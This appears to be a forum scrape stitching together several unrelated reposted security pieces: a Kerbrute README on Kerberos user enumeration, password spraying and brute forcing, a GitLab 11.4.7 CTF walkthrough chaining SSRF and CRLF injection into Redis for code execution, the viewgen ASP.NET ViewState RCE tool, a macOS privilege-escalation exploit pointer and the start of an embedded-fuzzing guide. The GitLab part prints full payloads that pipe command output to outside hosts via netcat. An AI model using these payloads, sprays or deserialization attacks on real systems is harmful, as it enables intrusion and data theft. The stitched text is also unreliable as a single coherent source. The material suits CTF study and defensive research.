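# KRB-ERROR codes from RFC 4120 that matter for user enumeration
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # client not found in the Kerberos database
KDC_ERR_CLIENT_REVOKED = 18       # client credentials revoked (e.g. locked out)
KDC_ERR_PREAUTH_REQUIRED = 25     # additional pre-authentication required

def classify(error_code):
    """Interpret the KDC's reply to an AS-REQ sent without pre-auth."""
    if error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "invalid username"
    if error_code == KDC_ERR_PREAUTH_REQUIRED:
        return "valid username"   # KDC asks for pre-auth, so the account exists
    if error_code == KDC_ERR_CLIENT_REVOKED:
        return "valid but locked/revoked"
    return "unknown"

print(classify(KDC_ERR_PREAUTH_REQUIRED))  # valid username
```

Because the probe never completes a login attempt, the "valid username" path leaves no failed-logon trail, which is exactly why this check is lockout-safe.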
root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt

    [kerbrute ASCII art banner]

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:28:04 >  Using KDC(s):
2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88
2019/03/06 21:28:04 >  [+] VALID USERNAME:  amata@lab.ropnop.com
2019/03/06 21:28:04 >  [+] VALID USERNAME:  thoffman@lab.ropnop.com
2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds

Password Spray

With passwordspray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

    [kerbrute ASCII art banner]

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:37:29 >  Using KDC(s):
2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88
2019/03/06 21:37:35 >  [+] VALID LOGIN:  callen@lab.ropnop.com:Password123
2019/03/06 21:37:37 >  [+] VALID LOGIN:  eshort@lab.ropnop.com:Password123
2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds

Brute User

This is a traditional bruteforce attack against a single username. Only run this if you are sure there is no lockout policy!
This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

    [kerbrute ASCII art banner]

Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

2019/03/06 21:38:24 >  Using KDC(s):
2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88
2019/03/06 21:38:27 >  [+] VALID LOGIN:  thoffman@lab.ropnop.com:Summer2017
2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds

Installing

You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:

$ go get github.com/ropnop/kerbrute

With the repository cloned, you can also use the Makefile to compile for common architectures:

$ make help
help:     Show this help.
windows:  Make Windows x86 and x64 Binaries
linux:    Make Linux x86 and x64 Binaries
mac:      Make Darwin (Mac) x86 and x64 Binaries
clean:    Delete any binaries
all:      Make Windows, Linux and Mac x86/x64 Binaries

$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.

$ ls dist/
kerbrute_darwin_386    kerbrute_linux_386    kerbrute_windows_386.exe
kerbrute_darwin_amd64  kerbrute_linux_amd64  kerbrute_windows_amd64.exe

Credits

Huge shoutout to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5. An amazing project and very well documented. Couldn't have done any of this without that project.

Sursa: https://github.com/ropnop/kerbrute
GitLab 11.4.7 Remote Code Execution

21 Apr 2019 - Capture The Flag, Web Hacking, Exploit Walkthrough

TL;DR

SSRF targeting Redis for RCE via IPv6/IPv4 address embedding, chained with CRLF injection in the git:// protocol.

Video: watch on YouTube

Introduction

At the Real World CTF, we came across an interesting web challenge called flaglab. The description said: "You might need a 0day". There was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0.

Upon doing a google search on the GitLab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and that it was just a waste of time...

But as it turns out, we were wrong on these assumptions. During a post-CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8, and the commit history of the newer version reveals several security patches. One of the bugs was an "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was actually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge with the knowledge gained so far.

Setup

Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file.
web:
  image: 'gitlab/gitlab-ce:11.4.7-ce.0'
  restart: always
  hostname: 'gitlab.example.com'
  environment:
    GITLAB_OMNIBUS_CONFIG: |
      external_url 'http://gitlab.example.com'
      redis['bind']='127.0.0.1'
      redis['port']=6379
      gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
  ports:
    - '5080:80'
    - '50443:443'
    - '5022:22'
  volumes:
    - './srv/gitlab/config:/etc/gitlab'
    - './srv/gitlab/logs:/var/log/gitlab'
    - './srv/gitlab/data:/var/opt/gitlab'
    - './steg0_initial_root_password:/steg0_initial_root_password'
    - './flag:/flag:ro'

From the above YAML file, the following conclusions can be made:

- The docker image used is GitLab Community Edition 11.4.7 (gitlab-ce:11.4.7-ce.0).
- The Redis server runs on port 6379 and is listening on localhost.
- The rails initial_root_password is set using a file called steg0_initial_root_password.
- There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080.
- Additionally, there are volumes, which mount local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag are also copied into the container.

You can create these required files and folders using the following commands:

# Create required folders for the gitlab logs, data and configs. leave it empty
mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs

# Create a random password using python
python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password

# ==OR== Choose your own password
echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password

# Create a test flag
echo "RWCTF{this_is_flaglab_flag}" > ./flag

Now that we have the required files and folders, we can start the docker container using the following command.
$ docker-compose up

The process of downloading the base image and building the GitLab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version.

Now it's time to configure the Chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command line, which is a bit handier:

/path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list=""

I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following:

127.0.0.1 localhost.com

Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup!

The Bugs

As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally, we also know that the flag file is located in / (the root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability.

Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks; we also have an XSS, but it's rather not that interesting for us; and finally, we have a CRLF injection (Carriage-Return/Line-Feed), which is basically newline injection. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted.
Looking at some test cases, apparently special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks:

# SSRF protection bypass
https://[0:0:0:0:0:ffff:127.0.0.1]

The other issue was a CRLF vulnerability in Project hooks; scrolling down to the test cases, you can see it's merely URLs with newlines, either URL encoded or simply regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability.

In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came across this technique, but I believe it was @Agarri_FR who tweeted about this back in 2015, and there was also a blog post by him from 2014. I did come across many bug bounty writeups, so everyone who's into web security should know about this.

Exploitation

Now onto the fun stuff. First, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on "create a new project", I saw multiple ways to import a project and one of them was "Repo by URL", which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL:

http://127.0.0.1/test/somerepo.git

But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed".
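To see why that IPv6 form matters: an IPv4-mapped IPv6 address still reaches 127.0.0.1 even though the literal never matches a naive localhost blacklist. A quick illustration (my own sketch using Python's ipaddress module, not GitLab's actual validation code):

```python
import ipaddress

# The address from the bypass test case: an IPv6 literal with an
# embedded (IPv4-mapped) IPv4 address.
addr = ipaddress.ip_address("0:0:0:0:0:ffff:127.0.0.1")

# It parses as an IPv6 address, so string checks for "127.0.0.1"
# or "localhost" don't fire...
print(addr.version)                   # 6

# ...but it maps straight onto the IPv4 loopback address:
print(addr.ipv4_mapped)               # 127.0.0.1
print(addr.ipv4_mapped.is_loopback)   # True
```

A blacklist that resolves and normalizes addresses (rather than comparing strings) would catch this, which is essentially what the 11.4.8 fix adds tests for.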
Now, we can try the bypass using the special IPv6 address. So we change the import URL to the following:

http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git

Before importing using this URL, we need a server listening on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container, install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's list all the running Docker containers to know which one to get a shell on:

# get a list of running docker containers
$ docker ps
CONTAINER ID   IMAGE                          COMMAND   CREATED   STATUS   NAMES
bd9daf8c07a6   gitlab/gitlab-ce:11.4.7-ce.0   ...       ...       ...      ...

We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying the container ID:

$ docker exec -i -t bd9daf8c07a6 "/bin/bash"

Here, bd9daf8c07a6 is the container ID, -i means interact with /bin/bash, and -t means create a tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests:

root@gitlab:~ apt update && apt install -y netcat

Setting up a raw TCP server is as simple as the following command:

root@gitlab:~ nc -lvp 1234

Here, -l tells netcat to listen, -v is for verbose output, and -p specifies the port number the server has to bind to. Now that we have our SSRF testing setup done, let's make the same import request to see if we can trigger the SSRF. Additionally, instead of specifying the URL from the web application in the browser, we can use Burp Suite's Repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there, and send the request.
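As an aside, the throwaway listener doesn't have to be netcat; the same one-connection listener can be sketched in a few lines of Python (illustrative, roughly equivalent to nc -lvp 1234):

```python
import socket

def listen_once(host="0.0.0.0", port=1234):
    """Accept a single TCP connection and return (peer address, received bytes),
    roughly what `nc -lvp 1234` shows interactively."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    conn, addr = srv.accept()   # blocks until the SSRF (or any client) connects
    data = conn.recv(4096)      # first chunk of whatever the client sent
    conn.close()
    srv.close()
    return addr, data
```

Calling listen_once() and then firing the import request should return the raw HTTP request GitLab's importer sends, confirming the SSRF the same way the netcat session does.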
As you can see from the above image, we did get the request trapped in our netcat listener, and this confirms that there is an SSRF which can talk to internal services - which in our case was the local netcat server on port 1234. This means that we can talk to the internal Redis server running on port 6379 (specified in the docker-compose.yml). But what is Redis and how does GitLab use it?

Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways, like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around:

# quick test with redis
root@gitlab:~ nc 127.0.0.1 6379
blah
- ERR unknown command 'blah'
set liveoverflow test
+OK
asd
- ERR unknown command 'asd'
get liveoverflow
$4
test

Redis speaks a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we tried to send an HTTP request to Redis? Would Redis execute commands? Let's try:

# http request test with redis
root@gitlab:~ nc 127.0.0.1 6379
GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1
Host: [0:0:0:0:0:ffff:127.0.0.1]:1234
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache
- Err wrong number of arguments for 'get' command
root@gitlab:~

It gives us an error saying that there is a wrong number of arguments for the 'get' command, which makes sense because from the earlier example we know how the 'get' command in Redis works. But then we were dropped back to the shell; however, from earlier we saw that Redis doesn't quit even on errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer: the second line, Host: [0:0:0:0:0:ffff:127.0.0.1]:1234, is responsible for Redis terminating the connection unexpectedly.
This happens because SSRF to Redis is a huge issue, and Redis has implemented a "fix" for this. If the string "Host:" is sent to the Redis server as a command, it knows that this is an HTTP request trying to smuggle some Redis commands, and it stops the execution by closing the connection. If only we could get our payload in between the first line (GET /test...) and the second (Host: ...), we could make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough* Yes! Remember the CRLF injection bug we saw in the Security Release and the commit history? We can use that! From the commit history's test cases, we can see that the injection is pretty straightforward: merely adding newlines, URL encoded, should do the trick. For example:

http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be Converted To
http://127.0.0.1:333/
test
blah.git

However, this didn't work out. I'm not sure why, but changing the protocol from http:// to git:// makes it work.

# Does work :)
git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be Converted To
git://127.0.0.1:333/
test
blah.git

Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on to creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability, smuggling one protocol (Redis) inside another (git://), and get Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it.
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

As you know, Redis can also be used for background job queues. These jobs are handled by Sidekiq, a background job processor for Ruby. We can look at the list of Sidekiq queues to see if there's anything that we can use.

...
- [default, 1]
- [pages, 1]
- [system_hook_push, 1]
- [propagate_service_template, 1]
- [background_migration, 1]
...

There's system_hook_push, which can be used to handle new jobs, and it's the same one used in the actual payload. Now, to execute code/commands, we need a class that will do it for us; think of this as a gadget. Fortunately, Jobert has also found the right class: gitlab_shell_worker.rb.

class GitlabShellWorker
  include ApplicationWorker
  include Gitlab::ShellAdapter
  def perform(action, *arg)
    gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
  end
end

As you can see, this is exactly the class we've been looking for. GitlabShellWorker is called with arguments like class_eval and the actual command that needs to be executed, which in our case is the following.

open('| COMMAND_TO_BE_EXECUTED').read

In the actual payload, we push the job onto the system_hook_push queue and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag.

$ nc -lvp 1234

The final payload looks like the following.
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec

Some points to note:

In the payload above, each Redis command needs a whitespace before it on every line - no clue why.

cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener.

An extra exec command is added so that the first one is executed properly and the second one gets concatenated with the next line instead of the first one. This is done so that the important part of the payload won't break.

The final import URL with the payload looks like this:

# No Encoding
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec /ssrf.git

# URL encoded
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
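Assembling this URL by hand is error-prone, and sketching the construction in Python makes the moving parts easier to see: the Sidekiq job JSON, the mandatory leading space before each Redis command, and the CRLF percent-encoding. This is an illustrative reconstruction (field values copied from the payload above), not the tooling used in the writeup, and it over-encodes slightly compared to the hand-built string, which decodes to the same thing:

```python
import json
from urllib.parse import quote

def gitlab_shell_job(command):
    """Sidekiq job that makes GitlabShellWorker#perform run class_eval on our command."""
    return json.dumps({
        "class": "GitlabShellWorker",
        "args": ["class_eval", f"open('|{command}').read"],
        "retry": 3,
        "queue": "system_hook_push",
        "jid": "ad52abc5641173e217eb2e52",
        "created_at": 1513714403.8122594,
        "enqueued_at": 1513714403.8129568,
    })

def build_import_url(command, redis="[0:0:0:0:0:ffff:127.0.0.1]:6379"):
    job = gitlab_shell_job(command).replace('"', '\\"')  # escape for the inline command
    lines = [
        "multi",
        "sadd resque:gitlab:queues system_hook_push",
        f'lpush resque:gitlab:queue:system_hook_push "{job}"',
        "exec",
        "exec",
    ]
    # Each smuggled command is preceded by CRLF plus the mandatory leading space.
    smuggled = "".join("\r\n " + line for line in lines) + "\r\n"
    return f"git://{redis}/{quote(smuggled, safe='')}/ssrf.git"

url = build_import_url("cat /flag | nc 192.168.178.21 1234")
print(url[:60])  # starts with git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi...
```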
Now if we send the "Repo by URL" request with this URL, we get the flag!

Conclusion and Takeaways

This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing that one of the reported bugs was by Chaitin Tech (the organizers), solving it was just a matter of 2-3 hours. Do proper research before jumping to conclusions. It's all about the mindset.

Resources
docker-compose.yml
Video Explanation

LiveOverflow (and PwnFunction) wannabe hacker...

Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
-
-
-
viewgen

ASP.NET ViewState Generator

viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files

Requirements: Python 3

Installation

pip3 install --upgrade -r requirements.txt or ./install.sh

Usage

$ viewgen -h
usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND] [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG] [--dkey DKEY] [--dalg DALG] [-e] [payload]

viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files

positional arguments:
payload ViewState payload (base 64 encoded)

optional arguments:
-h, --help show this help message and exit
--webconfig WEBCONFIG automatically load keys and algorithms from a web.config file
-m MODIFIER, --modifier MODIFIER VIEWSTATEGENERATOR value
-c COMMAND, --command COMMAND Command to execute
--decode decode a ViewState payload
--guess guess signature and encryption mode for a given payload
--check check if modifier and keys are correct for a given payload
--vkey VKEY validation key
--valg VALG validation algorithm
--dkey DKEY decryption key
--dalg DALG decryption algorithm
-e, --encrypted ViewState is encrypted

Examples

$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
[+] ViewState
(('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)
[+] Signature
7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6
[+] Signature match

$ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk"
r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" [+] ViewState is not encrypted [+] Signature algorithm: SHA1 $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" [!] ViewState is encrypted [+] Algorithm candidates: AES SHA1 DES/3DES SHA1 Achieving Remote Code Execution Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used. You can use the built-in command option (ysoserial.net based) to generate a payload: $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld" However, you can also generate it manually: 1 - Generate a payload with ysoserial.net: > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld" 2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp 3 - Generate the signed/encrypted payload: $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD 4 - Send a POST request with the generated ViewState to the same endpoint 5 - Profit ?? Thanks @orange_8361, the author of Why so Serials (HITCON CTF 2018) @infosec_au @smiegles BBAC CTF Writeups about this technique https://xz.aliyun.com/t/3019 https://cyku.tw/ctf-hitcon-2018-why-so-serials/ Talks about this technique https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints Sursa: https://github.com/0xACB/viewgen
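For intuition about what "signing with a leaked validationKey" means: for an unencrypted ViewState, the MAC is an HMAC over the serialized payload, appended to it before the base64 step. The sketch below is deliberately simplified; real ASP.NET also mixes in the __VIEWSTATEGENERATOR modifier and, on newer frameworks, purpose-based key derivation, which tools like viewgen handle for you:

```python
import base64
import hashlib
import hmac

def sign_viewstate(payload_b64: str, validation_key_hex: str) -> str:
    """Append an HMAC-SHA1 over the decoded payload (simplified sketch)."""
    data = base64.b64decode(payload_b64)
    key = bytes.fromhex(validation_key_hex)
    mac = hmac.new(key, data, hashlib.sha1).digest()
    return base64.b64encode(data + mac).decode()

signed = sign_viewstate(base64.b64encode(b"demo-viewstate").decode(),
                        "000102030405060708090a0b0c0d0e0f10111213")
raw = base64.b64decode(signed)
print(len(raw) - len(b"demo-viewstate"))  # 20, the SHA-1 digest size
```

With the key leaked, the server's integrity check becomes forgeable, which is why a ysoserial.net gadget chain signed this way deserializes and executes.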
-
Feedback Assistant root privilege escalation

make run

Tested on 10.11.x - 10.14.3

Sursa: https://github.com/ChiChou/sploits/tree/master/CVE-2019-8565
-
Modern Vulnerability Research Techniques on Embedded Systems

This guide takes a look at vetting an embedded system (an ASUS RT-AC51U) using AFL, angr, a cross compiler, and some binary instrumentation, without access to the physical device. We'll go from static firmware to thousands of executions per second of fuzzing on emulated code. (Sorry, no 0days in this post)

Asus is kind enough to provide the firmware for their devices online. Their firmware is generally a root file system packed into a single file using squashfs. As shown below, binwalk can run through this firmware image and identify the filesystem for us.

$ binwalk RT-AC51U_3.0.0.4_380_8457-g43a391a.trx
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
64 0x40 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3551984 bytes
1174784 0x11ED00 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13158586 bytes, 1492 inodes, blocksize: 131072 bytes, created: 2019-01-09 11:06:39

Binwalk supports carving the filesystem out of the firmware image through the -Mre flags and will put the resulting root file system into a folder titled squashfs-root.

$ ls
40 _40.extracted squashfs-root
$ ls squashfs-root/
asus_jffs cifs2 etc_ro lib opt rom sys usr
bin dev home mmc proc root sysroot var
cifs1 etc jffs mnt ra_SKU sbin tmp www

Motivation

The LD_PRELOAD trick is a method of hooking symbols in a given binary so that they call your symbol, which the loader has placed before the reference to the original symbol. This can be used to hook functions, like malloc and free in the case of libraries like libdheap, to call your own code and perform logging or other instrumentation-based analysis.
The general format requires compiling a small stub of C code and then running your binary like this:

LD_PRELOAD=/Path/To/My/Library.so ./Run_Binary_As_Normal

I wanted to try a trick I saw online to create a fast and effective fuzzer for network protocol fuzzing. This github gist shows a PoC of creating an LD_PRELOAD'd library that intercepts libc's call to main and replaces it with our own.

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>

/* Trampoline for the real main() */
static int (*main_orig)(int, char **, char **);

/* Our fake main() that gets called by __libc_start_main() */
int main_hook(int argc, char **argv, char **envp)
{
    // Do my stuff
}

/*
 * Wrapper for __libc_start_main() that replaces the real main
 * function with our hooked version.
 */
int __libc_start_main(
    int (*main)(int, char **, char **),
    int argc,
    char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
{
    /* Save the real main function address */
    main_orig = main;

    /* Find the real __libc_start_main()... */
    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");

    /* ... and call it with our custom main function */
    return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
}

My thought was to then call a function inside of the now-loaded binary, starting from main. Any following calls or symbol lookups from the directly called function should resolve correctly because the main binary is loaded into memory! Defining a function prototype and then calling the function seemed to work. I can pull a function address out of a binary and jump to it with arbitrary arguments, and the compiler ABI will place the arguments into the runtime correctly to call the function.
/* Our fake main() that gets called by __libc_start_main() */
int main_hook(int argc, char **argv, char **envp)
{
    char user_buf[512] = {"\x00"};
    read(0, user_buf, 512);
    int (*do_thing_ptr)() = 0x401f30;
    int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
    printf("Ret val %d\n", ret_val);
    return 0;
}

This process is very manual and slow... Let's speed it up!

Setting up

The extracted firmware executables are all MIPS little-endian based and are interpreted through uClibc.

$ file bin/busybox
bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, stripped
$ ls lib/
ld-uClibc.so.0 libdl.so.0 libnsl.so.0 libws.so
libcrypt.so.0 libgcc_s.so.1 libpthread.so.0 modules
libc.so.0 libiw.so.29 librt.so.0 libdisk.so
libm.so.0 libstdc++.so.6

dockcross does not support uClibc cross compiling yet, so I needed to build my own cross compilers. Using buildroot I created a uClibc cross compiler for my Ubuntu 18.04 machine. To save time in the future I've posted this toolchain and a couple of others online here. This toolchain enables quick cross compiling of our LD_PRELOADed libraries.

The target is the asusdiscovery service. There has already been a CVE for it, and it proves hard to fuzz manually. The discovery service periodically sends packets out across the network, scanning for other ASUS routers. When another ASUS router sees this discovery packet, it responds with its information and the discovery service parses it. These response-based network services can be hard to fuzz through traditional network fuzzing tools like BooFuzz. So we're going to find where it parses the response and fuzz that logic directly with our new-found LD_PRELOAD tricks.
Pulling symbol information from this binary quickly reveals which function does the parsing: ParseASUSDiscoveryPackage.

